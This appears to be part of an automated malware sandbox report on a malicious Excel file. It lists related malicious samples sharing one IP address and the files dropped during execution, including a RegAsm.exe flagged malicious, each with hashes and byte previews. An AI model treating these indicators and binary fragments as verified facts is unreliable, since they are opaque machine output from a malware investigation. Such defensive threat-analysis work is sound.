                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607dDAT 2020_12_30.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                PSX7103491.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Beauftragung.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1I72L29IL3F.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Adjunto_2021.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Dok 0501 012021 Q_93291.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                invoice.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Shipping Details DHL.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                PI 99-14.doc__.rtfGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Archivo.docGet hashmaliciousBrowse
                                                                • 104.22.0.232

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Temp\RegAsm.exePayment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                                                  Overdue Invoice.xlsxGet hashmaliciousBrowse
                                                                    Quotation.xlsxGet hashmaliciousBrowse
                                                                      ENCLOSE ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        PO INV 195167 & 195324.xlsxGet hashmaliciousBrowse
                                                                          Bank letter.xlsxGet hashmaliciousBrowse
                                                                            Quotation.xlsxGet hashmaliciousBrowse
                                                                              PO 19030004.xlsxGet hashmaliciousBrowse
                                                                                New PO PO20.xlsxGet hashmaliciousBrowse
                                                                                  ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                    RFQ 00112.xlsxGet hashmaliciousBrowse
                                                                                      inquiry.xlsxGet hashmaliciousBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                        Category:dropped
                                                                                        Size (bytes):58936
                                                                                        Entropy (8bit):7.994797855729196
                                                                                        Encrypted:true
                                                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):326
                                                                                        Entropy (8bit):3.1086014193077407
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKlawwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:N1kPlE99SNxAhUegeT2
                                                                                        MD5:89A188366EFFB46949AD9093EDA55CF1
                                                                                        SHA1:6F3931CD5BA324C598AE0B45F7A1EA387E7DD1F2
                                                                                        SHA-256:9FBCA6A1EEDBC56E0350C4D21F36077F429AE6452F579A3864D44D11AD49A909
                                                                                        SHA-512:F964D8C36C44119D49191DD1CD2D990D8EE87FC5EEDB9042CD8839100CCDA240ECC054FE1172A8E487569D4EFC5DDE439A2234E992DB0373AE34AD88FE98411E
                                                                                        Malicious:false
                                                                                        Preview: p...... .........:.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                        C:\Users\user\AppData\Local\Temp\05DE0000
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):105034
                                                                                        Entropy (8bit):7.925151112906241
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:nda1iLoxgaSNUPZlsaFPOHYiR+rJEgjjajH7cA:nGiE/SN0ZltFPgY9rvgp
                                                                                        MD5:2A97A372C7AC14DDAF2BC6CECA6BCDE8
                                                                                        SHA1:6509EB9A038444C7CD44BF03B7B6536CCEBB73F0
                                                                                        SHA-256:DBC762A96077FDB3858F84F2642813C5CAA88A1B41FFEB34C1FD5BAB9F6F2D9D
                                                                                        SHA-512:0EC40FBAB270674794C191A66EAC1FD609D9D264EE7A835B34F61A63ABA2687E2E8B83B23FD83C409050C6072473F7AFEC4FB521CD327D2F00DD9A42531B3A45
                                                                                        Malicious:false
                                                                                        Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Users\user\AppData\Local\Temp\Cab8018.tmp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                        Category:dropped
                                                                                        Size (bytes):58936
                                                                                        Entropy (8bit):7.994797855729196
                                                                                        Encrypted:true
                                                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                        Malicious:false
                                                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                        C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Process:C:\Users\user\ntrwe.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64672
                                                                                        Entropy (8bit):6.033474133573561
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr
                                                                                        MD5:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                        SHA1:017801B7EBD2CC0E1151EEBEC14630DBAEE48229
                                                                                        SHA-256:5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                                                                                        SHA-512:9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: Payment_Confirmation_Slip.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Overdue Invoice.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                                        • Filename: ENCLOSE ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                        • Filename: PO INV 195167 & 195324.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Bank letter.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                                        • Filename: PO 19030004.xlsx, Detection: malicious, Browse
                                                                                        • Filename: New PO PO20.xlsx, Detection: malicious, Browse
                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                        • Filename: RFQ 00112.xlsx, Detection: malicious, Browse
                                                                                        • Filename: inquiry.xlsx, Detection: malicious, Browse
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.W..............0.................. ........@.. ....................... ......k.....`.....................................O.......8................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H........A..`p...........................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.;...}S......i.>...}T......i.>...}U.....+m...(....o......r]..p.o ...,..{T.......{U........o!....+(.ra..p.o ...,..{T.......
                                                                                        C:\Users\user\AppData\Local\Temp\Tar8019.tmp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):152533
                                                                                        Entropy (8bit):6.31602258454967
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                        Malicious:false
                                                                                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                        C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview: 1
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):35006
                                                                                        Entropy (8bit):0.6024827961083986
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeR:i
                                                                                        MD5:AD0D2FB7F4EC355D0D8CBF5C9235259B
                                                                                        SHA1:C875BB3B2020FB4A1C8E6E694BA2296EBB31DF81
                                                                                        SHA-256:2598083577FF245674401A33AE940D5AE389E972B1DBB147FAA47B40156D965E
                                                                                        SHA-512:E345C2920A6F29AE14EA6181178E3F4252B20CFF01374BA47CB7A4EE80FFA749E424345D9AB03905A8818E6DE1A03917499C409DBB6DAA1D3EB3340C4AA68E9E
                                                                                        Malicious:false
                                                                                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\6Cprm97UTl.LNK
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 6 02:04:31 2021, mtime=Wed Jan 6 02:04:39 2021, atime=Wed Jan 6 02:04:40 2021, length=127488, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2028
                                                                                        Entropy (8bit):4.547448419157985
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8hz//o/XTr6N47KevRDv3qpdM7dD2hz//o/XTr6N47KevRDv3qpdM7dV:8hz/A/XT+NhtpQh2hz/A/XT+NhtpQ/
                                                                                        MD5:73C3A39789CB2C2692EF7B7D1BE021AF
                                                                                        SHA1:9B6DCC9611BABA41FE6CC83D220EEEA88E69B346
                                                                                        SHA-256:F01B6D9921D1A2744419D9283E221C129FAEF7C40CB5EC09BB47D9BE6BC2992C
                                                                                        SHA-512:82003A9023EC05876BE86D273E1975488B2D62F6F0A96B39C9C358B3A98492AF2DECF7F82967C0E5BC60B1A948C88FFB0AD1DCEF49B4C7E932616065ED763196
                                                                                        Malicious:false
                                                                                        Preview: L..................F.... ....;*.....?Ir.....`my..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R....Desktop.d......QK.X&R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....&R.. .6CPRM9~1.XLS..J......&R..&R..*...?.....................6.C.p.r.m.9.7.U.T.l...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\216554\Users.user\Desktop\6Cprm97UTl.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.6.C.p.r.m.9.7.U.T.l...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216554..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 02:04:39 2021, atime=Wed Jan 6 02:04:39 2021, length=8192, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):867
                                                                                        Entropy (8bit):4.493703650549725
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:85QSxCLgXg/XAlCPCHaX7B8NB/0VngUX+WnicvbWbDtZ3YilMMEpxRljK96TdJP8:85VxU/XTr6NqgUYeeDv3qprNru/
                                                                                        MD5:6998A322A53314E59F4908073525B31A
                                                                                        SHA1:F6A12ABF5E811E73424968267E355D9FE3FBB930
                                                                                        SHA-256:E2F9EF677017D5ED6785546BAFA65854E49111D370873CD60BD34ED2DE4A3496
                                                                                        SHA-512:9348C3E08429E03CAF5FD09B36DC46651958D817A4AA5D94C3602CC60E2A6214200D1302062D64296EF2CE41F98F29D4F2AA8F5863597AEF2C74E003AF21706E
                                                                                        Malicious:false
                                                                                        Preview: L..................F...........7G..?Ir.....?Ir...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R....Desktop.d......QK.X&R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216554\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216554..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):83
                                                                                        Entropy (8bit):4.598856563846179
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:oyBVomMLOxFp2SDxFp2mMLOxFp2v:dj6LOFpDFoLOFI
                                                                                        MD5:E843814B96F07781747EFD43C6082AEC
                                                                                        SHA1:C2F6049FE788D4C8B5492EA8531FB23655E52BB1
                                                                                        SHA-256:7D5160CFBB0EF9CF50C2AA8430F9841E1A6FDCFBA3EAE6D9BD061D0DFEBD1AD5
                                                                                        SHA-512:BD9EC0999C17CCB13FB893D41EE45F7B1325BDDDF3AD8CC23F599889CFD48EAB515B44E71E645C3773562DD6088C0468D0BC85CE81F7BB7050454BEF4218B757
                                                                                        Malicious:false
                                                                                        Preview: Desktop.LNK=0..[xls]..6Cprm97UTl.LNK=0..6Cprm97UTl.LNK=0..[xls]..6Cprm97UTl.LNK=0..
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0BO471L5716CBJPX3UA.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LE6CBUNRM6U6BL3TCXE0.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PXJFD74DLMN8ONH9QYBS.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
